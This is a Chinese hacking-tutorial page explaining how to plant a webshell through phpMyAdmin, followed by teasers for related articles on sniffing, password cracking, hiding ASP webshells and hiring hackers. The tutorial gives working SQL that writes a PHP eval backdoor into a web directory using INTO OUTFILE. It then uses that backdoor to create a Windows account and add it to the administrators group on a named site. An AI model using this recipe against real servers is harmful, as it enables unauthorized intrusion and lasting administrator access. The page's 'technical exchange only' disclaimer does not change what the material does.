利用phpMyAdmin拿webshell
首先用暴路径漏洞找到绝对路径,然后替换下面的路径
随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell)
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;
这是我们的后门
http://chncto.com/phpmyadmin/eval.php
加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add
相关文章
dSniff的典型性主要用途是啥?
什么叫dSniff? dSniff是由Dug Song建立的数据流量剖析和登陆密码嗅探工具,用以分析各种各样运用协议书并获取有关数据信息。dsniff,mailsnarf,filesnarf,msg...
另类隐藏保护asp大马地址方法
我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了 或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。 如何加...
谁能找到免费黑客人员联系方式?求告知黑客联系方式
在一些好莱坞电影中,我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码,而且不会一下子全部入侵/破解,这是不是令人羡慕?事实上,我们也可以像电影和游戏中的黑客一样攻...
动易CMS拿shell 图文教程
原创作者:泪舞 Qq:8109217 ( 转载请写上作者名 ) 动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易...
电脑漏洞_黑客是怎样找到电脑漏洞的
黑客是怎样找到电脑漏洞的:为了把损失降低到最低限度,我们一定要有安全观念,并掌握一定的安全防范措施,禁绝让黑客无任何机会可趁。下面我们就来研究一下那些黑客是如何找到你计算机中的安全漏洞的,只有了解...
THCHydra是完全免费的吗?
什么叫THC Hydra? THC Hydra是一种密码破解专用工具,能够 对超出五十种协议书实行十分快的词典进攻。它是一个迅速平稳的互联网登陆黑客工具,它应用词典或暴力行为进攻来试着登陆页面上的各...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!